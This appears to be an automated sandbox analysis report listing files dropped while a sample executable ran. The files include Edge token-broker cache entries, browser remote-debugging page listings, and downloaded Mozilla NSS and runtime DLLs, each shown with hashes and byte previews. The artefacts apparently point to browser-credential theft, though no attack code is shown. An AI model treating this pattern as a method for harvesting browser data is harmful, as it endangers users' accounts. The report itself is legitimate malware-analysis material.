                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44600
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.096730044969757
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBtwuAhDO6vP6OwaO3JlgyluFDncGoup1Xl3jVzXr2:z/Ps+wsI7ynEn6QaOMchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:E42114B7A1DC1B26DA4DF41620780334
                                                                                                                                                                                                                                                                                                                                SHA1:461FDDB544F0F1734E296AF1A3273AFFBD5F6892
                                                                                                                                                                                                                                                                                                                                SHA-256:2565A1C4A544902FA0D9829F75BB94168EB921A1D6F675E1A4C83701C5ADC164
                                                                                                                                                                                                                                                                                                                                SHA-512:5BBC1EA006768D05B8009A463B7DF418FB8C5CE9F5B4ECFDE65A81E3E9E466391FF702F75A0FFD5925545D4AE2CAFC0A7221894A4B88D5E8A94FA50F749941D9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.846134975683284
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxJyxl9Il8uoTI4WP2ocgEqTaA/R602RPYzd1rc:miWYOTIr2Nq3pNePYU
                                                                                                                                                                                                                                                                                                                                MD5:B92D8C5008A62771E96086EFFC748C89
                                                                                                                                                                                                                                                                                                                                SHA1:4759D8045BACD7CC55B1975955A138290C80BE58
                                                                                                                                                                                                                                                                                                                                SHA-256:FD567DDE802445B4F847F08E8959A288F2710A0772D7B5972BA6E689D2B664A4
                                                                                                                                                                                                                                                                                                                                SHA-512:1483353EE6D833035C9D7D5507EA33E28BD960554050A73EE3DC9BBDD8929A55345F86FF4AE6A9A04680BB6FFC8A05547383C5A67BCACD694B8C04032DE5460A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.H.9.E.I.U.p.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.V.M.J.R.k.N.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.001274897929601
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:8MYOTIU0YlZ0P+OQBS0KWf0P/9YU8ORFQE7rGibwdn:tbT2YoPQBSWe/9Y9gFFqibw9
                                                                                                                                                                                                                                                                                                                                MD5:5EF0D5A156213661DD7F4C96BCDED708
                                                                                                                                                                                                                                                                                                                                SHA1:5823023278FB185C59853B63CE18A435D2CCFAD7
                                                                                                                                                                                                                                                                                                                                SHA-256:6CB6EC36BA1E36C199A18C9181A405CC269C990D5A1F33674C64611BF73B270F
                                                                                                                                                                                                                                                                                                                                SHA-512:C983BCFCC93134722E6CFB14F5C1D41935B2DDFD5FDEFBC15A9EB91D0477DEE6BF4FD1C115B6D59D83DF0F5B1AA2339BC74C548A372F3BC5C7877DD0499A3A65
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".+.g.3.h.9.n.w.p.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.V.M.J.R.k.N.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8928627693836693
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xfxl9Il8uoTsPafnKvlJyGgUWh4VMQ9vlOd/vc:aBYOTNfnY0UmM9Z
                                                                                                                                                                                                                                                                                                                                MD5:A1AB9902581D79E5459C005FF4F4AE16
                                                                                                                                                                                                                                                                                                                                SHA1:4E26746E44B7E8FD38D55E5B3E61BF9F6071FE4C
                                                                                                                                                                                                                                                                                                                                SHA-256:18B30A6E1D036E3F65ADB8C78A44FBE66B01DD3FFA1282A79145867E744CF065
                                                                                                                                                                                                                                                                                                                                SHA-512:F20799191C7CCA622243053FD93026B0C392E91C628EC7AA2373828B0F8CD653FDE189992B60C658CBA4D04F4C500B97787EDFA5587259BDFEEA52F71A2E7321
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".s.0.q.p.J.0.5.I.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.V.M.J.R.k.N.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.393795563743844
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:6NnQTeHQLNnQq8zUbQqfNnQkP8P09QkPHNnQ1dgEQiNnQYQy8NnQcDQUNnQswQI2:6NoNz8zMfNhsKHNsrNp8NRrNzEN/b7I
                                                                                                                                                                                                                                                                                                                                MD5:B78FDA0558A090581B8AE1846B4EB749
                                                                                                                                                                                                                                                                                                                                SHA1:671A2CFCB93D7709A562FF44231C321C662C8A85
                                                                                                                                                                                                                                                                                                                                SHA-256:439C42B11AB0A5C7C5AD38AA00640A9A1A15649769EC4A17BF6FAD72B6F848AD
                                                                                                                                                                                                                                                                                                                                SHA-512:8549A97505D470825419C94672A5F804A89DDC968CC131721605D7C5061D3A15A22CF40BDBDAC3384B5555A6C4611C3D7E22E34034C9730E61DA17660FE89FB3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/041B9DF0C1B109E3EF6A19B429E68FBB",.. "id": "041B9DF0C1B109E3EF6A19B429E68FBB",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/041B9DF0C1B109E3EF6A19B429E68FBB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/EBF4352FF5763A747134B79E832563F0",.. "id": "EBF4352FF5763A747134B79E832563F0",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/EBF4352FF5763A747134B79E832563F0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3740846574480585
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:SfNaoQBTEQdfNaoQ0QvfNaoQ5QSfNaoQaJ10UrU0U8QaW:6NnQBTEQJNnQ0QHNnQ5Q6NnQ80UrU0Uh
                                                                                                                                                                                                                                                                                                                                MD5:7709434C68441807E5CC3E15C432279C
                                                                                                                                                                                                                                                                                                                                SHA1:21CD3BD8CAD0F25C1D5914B3F7E0E9A4D439E18E
                                                                                                                                                                                                                                                                                                                                SHA-256:664FD7D9231FEEB53803E674A403E8073B0D49EB17B37A3B73DAE06374574439
                                                                                                                                                                                                                                                                                                                                SHA-512:C7C402F55A7AAAC3640DA608B41CE30DDA20679FFFD3CBDB3081C5C189E12E5E3E76273CE3A6EA0DDD11248214295C8C7CEBB32E8374AC77C853BAF3B0D21907
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/1C7F4304A02C14C40CF6EC010D076D49",.. "id": "1C7F4304A02C14C40CF6EC010D076D49",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/1C7F4304A02C14C40CF6EC010D076D49"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/573BDC2D5411ACE20D5FFB9D9A315760",.. "id": "573BDC2D5411ACE20D5FFB9D9A315760",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/573BDC2D5411ACE20D5FFB9D9A315760"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Antivirus:
